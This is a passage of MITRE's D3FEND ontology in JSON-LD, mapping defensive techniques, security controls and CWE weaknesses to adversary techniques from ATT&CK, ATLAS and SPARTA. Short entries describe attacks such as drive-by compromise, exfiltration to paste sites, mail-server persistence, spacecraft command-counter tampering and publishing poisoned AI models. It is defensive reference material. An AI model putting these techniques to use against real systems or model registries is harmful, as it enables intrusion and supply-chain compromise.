        "@id": "d3f:OutboundInternetEncryptedTraffic"
      },
      "skos:altLabel": [
        "Outbound Internet Encrypted RDP Traffic",
        "Outbound Internet Encrypted SSH Traffic"
      ]
    },
    {
      "@id": "d3f:CCI-002662_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system monitors outbound communications traffic per organization-defined frequency for unusual or unauthorized activities or conditions.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": {
        "@id": "d3f:OutboundTrafficFiltering"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2013-07-11T00:00:00"
      },
      "rdfs:label": "CCI-002662"
    },
    {
      "@id": "d3f:LocalAccountMonitoring",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:LocalAccountMonitoring"
      ],
      "d3f:analyzes": {
        "@id": "d3f:LocalUserAccount"
      },
      "d3f:d3fend-id": "D3-LAM",
      "d3f:definition": "Analyzing local user accounts to detect unauthorized activity.",
      "d3f:kb-reference": [
        {
          "@id": "d3f:Reference-AuditUserAccountManagement"
        },
        {
          "@id": "d3f:Reference-CAR-2016-04-004_SuccessfulLocalAccountLogin"
        },
        {
          "@id": "d3f:Reference-OSQueryWindowsUserCollectionCode"
        }
      ],
      "rdfs:label": "Local Account Monitoring",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:UserBehaviorAnalysis"
        },
        {
          "@id": "_:Nf610c35e69a840c98357c5e38ca288fe"
        }
      ]
    },
    {
      "@id": "_:Nf610c35e69a840c98357c5e38ca288fe",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:analyzes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:LocalUserAccount"
      }
    },
    {
      "@id": "d3f:T0817",
      "@type": "owl:Class",
      "d3f:attack-id": "T0817",
      "d3f:definition": "Adversaries may gain access to a system during a drive-by compromise, when a user visits a website as part of a regular browsing session. With this technique, the user's web browser is targeted and exploited simply by visiting the compromised website.",
      "rdfs:label": "Drive-by Compromise - ATTACK ICS",
      "rdfs:subClassOf": {
        "@id": "d3f:ATTACKICSInitialAccessTechnique"
      },
      "skos:prefLabel": "Drive-by Compromise"
    },
    {
      "@id": "d3f:SenderReputationAnalysis",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:SenderReputationAnalysis"
      ],
      "d3f:analyzes": {
        "@id": "d3f:Email"
      },
      "d3f:d3fend-id": "D3-SRA",
      "d3f:definition": "Ascertaining sender reputation based on information associated with a message (e.g. email/instant messaging).",
      "d3f:kb-article": "## How it works\n\nSender trust rating can be considered an indicator of the level of security risk and/or a trust level associated with a sender. The features considered in determining the trust rating include:\n\n* Length of time sender has sent emails to the enterprise\n* Number of recipients in the enterprise the sender interacts with\n* Sender vs. enterprise originated message ratio\n* Sender messages opened vs. not-opened ratio\n* Number of emails received from this sender\n* Number of emails replied to this sender\n* Number of emails from this sender not opened\n* Number of emails from this sender not opened that contain an attachment\n* Number of emails from this sender not opened that contain a URL\n* Number of emails sent to this sender\n* Number of email replies received from this sender.\n\nHigher values for the number of recipients the sender has interacted with or the number of emails received from the sender, for example, results in a higher trust rating. The trust rating can categorize the sender as unrated, neutral, trusted, suspicious, or malicious.\n\n## Considerations\nLegitimate emails from a sender may receive a lower trust rating over time if the sender's domain gets spoofed and is used to send unauthorized emails.",
      "d3f:kb-reference": {
        "@id": "d3f:Reference-SystemsAndMethodsForDetectingAnd_orHandlingTargetedAttacksInTheEmailChannel_GraphusInc"
      },
      "rdfs:label": "Sender Reputation Analysis",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:MessageAnalysis"
        },
        {
          "@id": "_:Nc81aa4e346304ae7b9ac3cc9a869c382"
        }
      ]
    },
    {
      "@id": "_:Nc81aa4e346304ae7b9ac3cc9a869c382",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:analyzes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Email"
      }
    },
    {
      "@id": "d3f:CWE-202",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-202",
      "d3f:definition": "When trying to keep information confidential, an attacker can often infer some of the information by using statistics.",
      "rdfs:label": "Exposure of Sensitive Information Through Data Queries",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-1230"
      }
    },
    {
      "@id": "d3f:NIST_SP_800-53_R5_RA-5_3",
      "@type": [
        "owl:NamedIndividual",
        "d3f:NISTControl"
      ],
      "d3f:control-name": "Vulnerability Monitoring and Scanning | Breadth and Depth of Coverage",
      "d3f:member-of": {
        "@id": "d3f:NIST_SP_800-53_R5"
      },
      "d3f:narrower": {
        "@id": "d3f:NetworkTrafficAnalysis"
      },
      "rdfs:label": "RA-5(3)"
    },
    {
      "@id": "d3f:T1464",
      "@type": "owl:Class",
      "d3f:attack-id": "T1464",
      "d3f:definition": "Adversaries may perform Network Denial of Service (DoS) attacks to degrade or block the availability of targeted resources to users. Network DoS can be performed by exhausting the network bandwidth that services rely on, or by jamming the signal going to or coming from devices.",
      "rdfs:label": "Network Denial of Service - ATTACK Mobile",
      "rdfs:subClassOf": {
        "@id": "d3f:ATTACKMobileImpactTechnique"
      },
      "skos:prefLabel": "Network Denial of Service"
    },
    {
      "@id": "d3f:DE-0003.01",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "DE-0003.01",
      "d3f:definition": "The VCC tracks how many commands the spacecraft has accepted. An adversary masks activity by zeroing, freezing, or selectively decrementing the VCC, or by steering actions through paths that do not increment it (maintenance dictionaries, alternate receivers, hidden handlers). They may also overwrite the telemetry field that reports the VCC so ground displays show a lower or steady count while high volumes of commands are processed. This breaks simple “command volume” heuristics and makes bursty activity look normal.",
      "d3f:modifies": {
        "@id": "d3f:SystemPlatformVariable"
      },
      "rdfs:label": "Vehicle Command Counter (VCC) - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/DE-0003/01/"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DE-0003"
        },
        {
          "@id": "_:Ndb906e420d58457ba5752f5dcccace52"
        }
      ],
      "skos:prefLabel": "Vehicle Command Counter (VCC)"
    },
    {
      "@id": "_:Ndb906e420d58457ba5752f5dcccace52",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:modifies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:SystemPlatformVariable"
      }
    },
    {
      "@id": "d3f:PearsonsCorrelationCoefficient",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-PCC",
      "d3f:kb-article": "## References\nWolfram MathWorld. (n.d.). Correlation Coefficient. [Link](https://mathworld.wolfram.com/CorrelationCoefficient.html)",
      "rdfs:label": "Pearson's Correlation Coefficient",
      "rdfs:subClassOf": {
        "@id": "d3f:Correlation"
      }
    },
    {
      "@id": "http://d3fend.mitre.org/ontologies/d3fend.owl",
      "@type": "owl:Ontology",
      "d3f:release-date": {
        "@type": "xsd:dateTime",
        "@value": "2026-03-31T00:12:00+00:00"
      },
      "dcterms:description": "D3FEND is a framework which encodes a countermeasure knowledge base as a knowledge graph. The graph contains the types and relations that define key concepts in the cybersecurity countermeasure domain and the relations necessary to link those concepts to each other. Each of these concepts and relations are linked to references in the cybersecurity literature.",
      "dcterms:license": "MIT",
      "dcterms:title": "D3FEND™ - A knowledge graph of cybersecurity countermeasures",
      "owl:versionIRI": {
        "@id": "http://d3fend.mitre.org/ontologies/d3fend/1.4.0/d3fend.owl"
      },
      "owl:versionInfo": "1.4.0",
      "rdfs:comment": "Use of the D3FEND Knowledge Graph, and the associated references from this ontology are subject to the Terms of Use. D3FEND is funded by the National Security Agency (NSA) Cybersecurity Directorate and managed by the National Security Engineering Center (NSEC) which is operated by The MITRE Corporation. D3FEND™ and the D3FEND logo are trademarks of The MITRE Corporation. This software was produced for the U.S. Government under Basic Contract No. W56KGU-18-D0004, and is subject to the Rights in Noncommercial Computer Software and Noncommercial Computer Software Documentation Clause 252.227-7014 (FEB 2012) Copyright 2022 The MITRE Corporation."
    },
    {
      "@id": "d3f:T1543.005",
      "@type": "owl:Class",
      "d3f:attack-id": "T1543.005",
      "d3f:definition": "Adversaries may create or modify container or container cluster management tools that run as daemons, agents, or services on individual hosts. These include software for creating and managing individual containers, such as Docker and Podman, as well as container cluster node-level agents such as kubelet. By modifying these services, an adversary may be able to achieve persistence or escalate their privileges on a host.",
      "rdfs:label": "Container Service",
      "rdfs:subClassOf": {
        "@id": "d3f:T1543"
      }
    },
    {
      "@id": "d3f:CCI-000022_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system enforces one or more organization-defined nondiscretionary access control policies over an organization-defined set of users and resources.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2009-05-13T00:00:00"
      },
      "rdfs:label": "CCI-000022"
    },
    {
      "@id": "d3f:implemented-by",
      "@type": "owl:ObjectProperty",
      "d3f:definition": "x implemented-by y: The entity x is realized or brought into operation by entity y.",
      "owl:inverseOf": {
        "@id": "d3f:implements"
      },
      "rdfs:label": "implemented-by",
      "rdfs:subPropertyOf": {
        "@id": "d3f:associated-with"
      }
    },
    {
      "@id": "d3f:ProcessImage",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:contains": {
        "@id": "d3f:ProcessSegment"
      },
      "d3f:definition": "A process image is a copy of a given process's state at a given point in time. It is often used to create persistence within an otherwise volatile system.",
      "rdfs:isDefinedBy": {
        "@id": "http://dbpedia.org/resource/System_image#Process_images"
      },
      "rdfs:label": "Process Image",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ComputingImage"
        },
        {
          "@id": "_:N60b89e93d1e14af29ab2a7bb0245cf7d"
        }
      ]
    },
    {
      "@id": "_:N60b89e93d1e14af29ab2a7bb0245cf7d",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:contains"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:ProcessSegment"
      }
    },
    {
      "@id": "d3f:T1059.003",
      "@type": "owl:Class",
      "d3f:attack-id": "T1059.003",
      "d3f:definition": "Adversaries may abuse the Windows command shell for execution. The Windows command shell ([cmd](https://attack.mitre.org/software/S0106)) is the primary command prompt on Windows systems. The Windows command prompt can be used to control almost any aspect of a system, with various permission levels required for different subsets of commands. The command prompt can be invoked remotely via [Remote Services](https://attack.mitre.org/techniques/T1021) such as [SSH](https://attack.mitre.org/techniques/T1021/004).(Citation: SSH in Windows)",
      "rdfs:label": "Windows Command Shell",
      "rdfs:subClassOf": {
        "@id": "d3f:T1059"
      }
    },
    {
      "@id": "d3f:authorizes",
      "@type": "owl:ObjectProperty",
      "d3f:definition": "x authorizes y: A subject x grants authorization or clearance for an agent y to use an object.  This relation indicates an authorization event has occurred.",
      "rdfs:isDefinedBy": {
        "@id": "http://wordnet-rdf.princeton.edu/id/00804987-v"
      },
      "rdfs:label": "authorizes",
      "rdfs:seeAlso": {
        "@id": "http://wordnet-rdf.princeton.edu/id/00805664-v"
      },
      "rdfs:subPropertyOf": [
        {
          "@id": "d3f:associated-with"
        },
        {
          "@id": "d3f:hardens"
        }
      ]
    },
    {
      "@id": "d3f:EventLogRotateEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event where the event log is rotated, often as part of log rotation policies to manage storage and ensure continuity.",
      "rdfs:label": "Event Log Rotate Event",
      "rdfs:subClassOf": {
        "@id": "d3f:EventLogEvent"
      }
    },
    {
      "@id": "d3f:AML.T0000.001",
      "@type": "owl:Class",
      "d3f:attack-id": "AML.T0000.001",
      "d3f:definition": "Pre-Print repositories, such as arXiv, contain the latest academic research papers that haven't been peer reviewed.\nThey may contain research notes, or technical reports that aren't typically published in journals or conference proceedings.\nPre-print repositories also serve as a central location to share papers that have been accepted to journals.\nSearching pre-print repositories  provide adversaries with a relatively up-to-date view of what researchers in the victim organization are working on.",
      "rdfs:label": "Pre-Print Repositories - ATLAS",
      "rdfs:seeAlso": {
        "@id": "https://atlas.mitre.org/techniques/AML.T0000.001"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:AML.T0000"
      },
      "skos:prefLabel": "Pre-Print Repositories"
    },
    {
      "@id": "d3f:HardwareDeviceUnbindEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event where a device is logically unbound from a system or process, releasing it from exclusive use or integration.",
      "rdfs:label": "Hardware Device Unbind Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:HardwareDeviceStateEvent"
        },
        {
          "@id": "_:N9a03aaab26ec438eb7cce0d8b255f4a5"
        }
      ]
    },
    {
      "@id": "_:N9a03aaab26ec438eb7cce0d8b255f4a5",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:preceded-by"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:HardwareDeviceBindEvent"
      }
    },
    {
      "@id": "d3f:T1505.002",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:adds": {
        "@id": "d3f:MessageTransferAgent"
      },
      "d3f:attack-id": "T1505.002",
      "d3f:definition": "Adversaries may abuse Microsoft transport agents to establish persistent access to systems. Microsoft Exchange transport agents can operate on email messages passing through the transport pipeline to perform various tasks such as filtering spam, filtering malicious attachments, journaling, or adding a corporate signature to the end of all outgoing emails.(Citation: Microsoft TransportAgent Jun 2016)(Citation: ESET LightNeuron May 2019) Transport agents can be written by application developers and then compiled to .NET assemblies that are subsequently registered with the Exchange server. Transport agents will be invoked during a specified stage of email processing and carry out developer defined tasks.",
      "d3f:modifies": {
        "@id": "d3f:MailServer"
      },
      "rdfs:label": "Transport Agent",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1505"
        },
        {
          "@id": "_:N3aa39d7de3c34d4e8943117309b0b33d"
        },
        {
          "@id": "_:N63fdcbfad85344d78f15f50af5268011"
        }
      ]
    },
    {
      "@id": "_:N3aa39d7de3c34d4e8943117309b0b33d",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:adds"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:MessageTransferAgent"
      }
    },
    {
      "@id": "_:N63fdcbfad85344d78f15f50af5268011",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:modifies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:MailServer"
      }
    },
    {
      "@id": "d3f:DS0009",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ATTACKEnterpriseDataSource"
      ],
      "d3f:definition": "Instances of computer programs that are being executed by at least one thread. Processes have memory space for process executables, loaded modules (DLLs or shared libraries), and allocated memory regions containing everything from user input to application-specific data structures",
      "d3f:exactly": {
        "@id": "d3f:Process"
      },
      "rdfs:comment": "The digital artifact mapping for this data source is only applicable to the Process Metadata component",
      "rdfs:label": "Process (ATT&CK DS)"
    },
    {
      "@id": "d3f:CCI-002201_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system, when transferring information between different security domains, uses organization-defined data type identifiers to validate data essential for information flow decisions.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": {
        "@id": "d3f:DomainTrustPolicy"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2013-06-24T00:00:00"
      },
      "rdfs:label": "CCI-002201"
    },
    {
      "@id": "d3f:OperatingSystemConfiguration",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "Information used to configure the services, parameters, and initial settings for an operating system.",
      "rdfs:label": "Operating System Configuration",
      "rdfs:subClassOf": {
        "@id": "d3f:ConfigurationResource"
      }
    },
    {
      "@id": "d3f:Histogramming",
      "@type": "owl:Class",
      "rdfs:label": "Histogramming",
      "rdfs:subClassOf": {
        "@id": "d3f:Summarizing"
      }
    },
    {
      "@id": "d3f:CWE-780",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-780",
      "d3f:definition": "The product uses the RSA algorithm but does not incorporate Optimal Asymmetric Encryption Padding (OAEP), which might weaken the encryption.",
      "rdfs:label": "Use of RSA Algorithm without OAEP",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-327"
      }
    },
    {
      "@id": "d3f:Reference-FileAndFolderPermissions",
      "@type": [
        "owl:NamedIndividual",
        "d3f:UserManualReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-2000-server/bb727008(v=technet.10)?redirectedfrom=MSDN"
      },
      "d3f:kb-organization": "Microsoft",
      "d3f:kb-reference-of": {
        "@id": "d3f:LocalFilePermissions"
      },
      "d3f:kb-reference-title": "File and Folder Permissions",
      "rdfs:label": "Reference - File and Folder Permissions"
    },
    {
      "@id": "d3f:AML.T0058",
      "@type": "owl:Class",
      "d3f:attack-id": "AML.T0058",
      "d3f:definition": "Adversaries may publish a poisoned model to a public location such as a model registry or code repository. The poisoned model may be a novel model or a poisoned variant of an existing open-source model. This model may be introduced to a victim system via [AI Supply Chain Compromise](/techniques/AML.T0010).",
      "rdfs:label": "Publish Poisoned Models - ATLAS",
      "rdfs:seeAlso": {
        "@id": "https://atlas.mitre.org/techniques/AML.T0058"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:ATLASResourceDevelopmentTechnique"
      },
      "skos:prefLabel": "Publish Poisoned Models"
    },
    {
      "@id": "d3f:CWE-691",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-691",
      "d3f:definition": "The code does not sufficiently manage its control flow during execution, creating conditions in which the control flow can be modified in unexpected ways.",
      "rdfs:label": "Insufficient Control Flow Management",
      "rdfs:subClassOf": {
        "@id": "d3f:Weakness"
      }
    },
    {
      "@id": "d3f:CWE-942",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-942",
      "d3f:definition": "The product uses a cross-domain policy file that includes domains that should not be trusted.",
      "rdfs:label": "Permissive Cross-domain Policy with Untrusted Domains",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CWE-183"
        },
        {
          "@id": "d3f:CWE-863"
        },
        {
          "@id": "d3f:CWE-923"
        }
      ]
    },
    {
      "@id": "d3f:CWE-1176",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1176",
      "d3f:definition": "The product performs CPU computations using algorithms that are not as efficient as they could be for the needs of the developer, i.e., the computations can be optimized further.",
      "rdfs:label": "Inefficient CPU Computation",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-405"
      }
    },
    {
      "@id": "d3f:CWE-500",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-500",
      "d3f:definition": "An object contains a public static field that is not marked final, which might allow it to be modified in unexpected ways.",
      "rdfs:label": "Public Static Field Not Marked Final",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-493"
      }
    },
    {
      "@id": "d3f:CWE-1070",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1070",
      "d3f:definition": "The product contains a serializable, storable data element such as a field or member, but the data element contains member elements that are not serializable.",
      "rdfs:label": "Serializable Data Element Containing non-Serializable Item Elements",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CWE-1076"
        },
        {
          "@id": "d3f:CWE-710"
        }
      ]
    },
    {
      "@id": "d3f:Reference-CAR-2020-11-006%3ALocalPermissionGroupDiscovery_MITRE",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ExternalKnowledgeBase"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://car.mitre.org/analytics/CAR-2020-11-006/"
      },
      "d3f:kb-abstract": "Cyber actors frequently enumerate local or domain permissions groups. The net utility is usually used for this purpose. This analytic looks for any instances of net.exe, which is not normally used for benign purposes, although system administrator actions may trigger false positives.",
      "d3f:kb-author": "MITRE",
      "d3f:kb-organization": "MITRE",
      "d3f:kb-reference-of": {
        "@id": "d3f:ProcessSpawnAnalysis"
      },
      "d3f:kb-reference-title": "CAR-2020-11-006: Local Permission Group Discovery",
      "rdfs:label": "Reference - CAR-2020-11-006: Local Permission Group Discovery - MITRE"
    },
    {
      "@id": "d3f:T0834",
      "@type": "owl:Class",
      "d3f:attack-id": "T0834",
      "d3f:definition": "Adversaries may directly interact with the native OS application programming interface (API) to access system functions. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes. (Citation: The MITRE Corporation May 2017) These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.",
      "rdfs:label": "Native API - ATTACK ICS",
      "rdfs:subClassOf": {
        "@id": "d3f:ATTACKICSExecutionTechnique"
      },
      "skos:prefLabel": "Native API"
    },
    {
      "@id": "d3f:T1567.003",
      "@type": "owl:Class",
      "d3f:attack-id": "T1567.003",
      "d3f:definition": "Adversaries may exfiltrate data to text storage sites instead of their primary command and control channel. Text storage sites, such as <code>pastebin[.]com</code>, are commonly used by developers to share code and other information.",
      "rdfs:label": "Exfiltration to Text Storage Sites",
      "rdfs:subClassOf": {
        "@id": "d3f:T1567"
      }
    },
    {
      "@id": "d3f:CWE-395",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-395",
      "d3f:definition": "Catching NullPointerException should not be used as an alternative to programmatic checks to prevent dereferencing a null pointer.",
      "rdfs:label": "Use of NullPointerException Catch to Detect NULL Pointer Dereference",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CWE-705"
        },
        {
          "@id": "d3f:CWE-755"
        }
      ]
    },
    {
      "@id": "d3f:LinuxMmap",
      "@type": "owl:Class",
      "d3f:definition": "Map files or devices into memory.",
      "rdfs:isDefinedBy": {
        "@id": "https://man7.org/linux/man-pages/man2/mmap.2.html"
      },
      "rdfs:label": "Linux Mmap",
      "rdfs:subClassOf": {
        "@id": "d3f:OSAPIAllocateMemory"
      }
    },
    {
      "@id": "d3f:has-sender",
      "@type": "owl:ObjectProperty",
      "d3f:definition": "x has-sender y: An agent y is the sender and encoder of the information contained in communication x.",
      "rdfs:isDefinedBy": {
        "@id": "http://www.ontologyrepository.com/CommonCoreOntologies/has_sender"
      },
      "rdfs:label": "has-sender",
      "rdfs:seeAlso": {
        "@id": "http://wordnet-rdf.princeton.edu/id/10598214-n"
      },
      "rdfs:subPropertyOf": {
        "@id": "d3f:associated-with"
      }
    },
    {
      "@id": "d3f:Authorization",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "Authorization is the function of specifying access rights to resources related to information security and computer security in general and to access control in particular. More formally, \"to authorize\" is to define an access policy. For example, human resources staff is normally authorized to access employee records and this policy is usually formalized as access control rules in a computer system. During operation, the system uses the access control rules to decide whether access requests from (authenticated) consumers shall be approved (granted) or disapproved (rejected). Resources include individual files or an item's data, computer programs, computer devices and functionality provided by computer applications. Examples of consumers are computer users, computer program",
      "rdfs:isDefinedBy": {
        "@id": "dbr:Authorization"
      },
      "rdfs:label": "Authorization",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DefensiveAction"
        },
        {
          "@id": "_:Na42f92a5c96043599fc9b4c2304bef07"
        }
      ]
    },
    {
      "@id": "_:Na42f92a5c96043599fc9b4c2304bef07",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:authorizes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Access"
      }
    },
    {
      "@id": "d3f:T0854",
      "@type": "owl:Class",
      "d3f:attack-id": "T0854",
      "d3f:definition": "Adversaries may perform serial connection enumeration to gather situational awareness after gaining access to devices in the OT network. Control systems devices often communicate to each other via various types of serial communication mediums. These serial communications are used to facilitate informational communication, as well as commands.  Serial Connection Enumeration differs from I/O Module Discovery, as I/O modules are auxiliary systems to the main system, and devices that are connected via serial connection are normally discrete systems.",
      "owl:deprecated": true,
      "rdfs:comment": "This technique has been deprecated.",
      "rdfs:label": "Serial Connection Enumeration - ATTACK ICS",
      "rdfs:subClassOf": {
        "@id": "d3f:ATTACKICSDiscoveryTechnique"
      },
      "skos:prefLabel": "Serial Connection Enumeration"
    },
    {
      "@id": "d3f:T1590.002",
      "@type": "owl:Class",
      "d3f:attack-id": "T1590.002",
      "d3f:definition": "Adversaries may gather information about the victim's DNS that can be used during targeting. DNS information may include a variety of details, including registered name servers as well as records that outline addressing for a target’s subdomains, mail servers, and other hosts. DNS, MX, TXT, and SPF records may also reveal the use of third party cloud and SaaS providers, such as Office 365, G Suite, Salesforce, or Zendesk.(Citation: Sean Metcalf Twitter DNS Records)",
      "rdfs:label": "DNS",
      "rdfs:subClassOf": {
        "@id": "d3f:T1590"
      }
    },
    {
      "@id": "d3f:T1587.003",
      "@type": "owl:Class",
      "d3f:attack-id": "T1587.003",
      "d3f:definition": "Adversaries may create self-signed SSL/TLS certificates that can be used during targeting. SSL/TLS certificates are designed to instill trust. They include information about the key, information about its owner's identity, and the digital signature of an entity that has verified the certificate's contents are correct. If the signature is valid, and the person examining the certificate trusts the signer, then they know they can use that key to communicate with its owner. In the case of self-signing, digital certificates will lack the element of trust associated with the signature of a third-party certificate authority (CA).",
      "rdfs:label": "Digital Certificates",
      "rdfs:subClassOf": {
        "@id": "d3f:T1587"
      }
    },
    {
      "@id": "d3f:GPT",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-GPT",
      "d3f:definition": "Generative pre-trained transformers (GPT) are a type of large language model (LLM) and a prominent framework for generative artificial intelligence.",
      "d3f:kb-article": "## References\nGenerative pre-trained transformer. (n.d.). In Wikipedia. [Link](https://en.wikipedia.org/wiki/Generative_pre-trained_transformer)",
      "d3f:synonym": "Generative Pre-trained Transformer",
      "rdfs:label": "GPT",
      "rdfs:subClassOf": {
        "@id": "d3f:Transformer-basedLearning"
      }
    },
    {
      "@id": "d3f:ObjectFile",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "An object file is a file that contains relocatable machine code.",
      "rdfs:label": "Object File",
      "rdfs:seeAlso": {
        "@id": "dbr:Object_file"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:File"
      }
    },
    {
      "@id": "d3f:CWE-434",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:cwe-id": "CWE-434",
      "d3f:definition": "The product allows the upload or transfer of dangerous file types that are automatically processed within its environment.",
      "d3f:synonym": "Unrestricted File Upload",
      "d3f:weakness-of": {
        "@id": "d3f:UserInputFunction"
      },
      "rdfs:label": "Unrestricted Upload of File with Dangerous Type",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CWE-669"
        },
        {
          "@id": "_:Nf02c858804c84efc95aca1715f76730c"
        }
      ]
    },
    {
      "@id": "_:Nf02c858804c84efc95aca1715f76730c",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:weakness-of"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:UserInputFunction"
      }
    },
    {
      "@id": "d3f:OTEstablishRemoteConnectionCommand",
      "@type": "owl:Class",
      "d3f:definition": "Used to establish an TCP/IP Connection to the target device.",
      "rdfs:label": "OT Establish Remote Connection Command",
      "rdfs:seeAlso": [
        {
          "@id": "https://icscsi.org/library/Documents/ICS_Protocols/Control%20Microsystems%20-%20DNP3%20User%20and%20Reference%20Manual.pdf"
        },
        {
          "@id": "https://modbus.org/docs/Modbus_Application_Protocol_V1_1b3.pdf"
        },
        {
          "@id": "https://nvlpubs.nist.gov/nistpubs/TechnicalNotes/NIST.TN.2023.pdf"
        }
      ],
      "rdfs:subClassOf": {
        "@id": "d3f:OTConnectionCommand"
      }
    },
    {
      "@id": "d3f:CWE-45",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-45",
      "d3f:definition": "The product accepts path input in the form of multiple internal dot ('file...dir') without appropriate validation, which can lead to ambiguous path resolution and allow an attacker to traverse the file system to unintended locations or access arbitrary files.",
      "rdfs:label": "Path Equivalence: 'file...name' (Multiple Internal Dot)",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CWE-165"
        },
        {
          "@id": "d3f:CWE-44"
        }
      ]
    },
    {
      "@id": "d3f:T1614.001",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1614.001",
      "d3f:definition": "Adversaries may attempt to gather information about the system language of a victim in order to infer the geographical location of that host. This information may be used to shape follow-on behaviors, including whether the adversary infects the target and/or attempts specific actions. This decision may be employed by malware developers and operators to reduce their risk of attracting the attention of specific law enforcement agencies or prosecution/scrutiny from other entities.(Citation: Malware System Language Check)",
      "d3f:queries": {
        "@id": "d3f:SystemConfigurationDatabase"
      },
      "rdfs:label": "System Language Discovery",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1614"
        },
        {
          "@id": "_:N77c1a90bccce46c5a54daf6d020c01f5"
        }
      ]
    },
    {
      "@id": "_:N77c1a90bccce46c5a54daf6d020c01f5",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:queries"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:SystemConfigurationDatabase"
      }
    },
    {
      "@id": "d3f:T1548.005",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:abuses": {
        "@id": "d3f:AccessControlConfiguration"
      },
      "d3f:attack-id": "T1548.005",
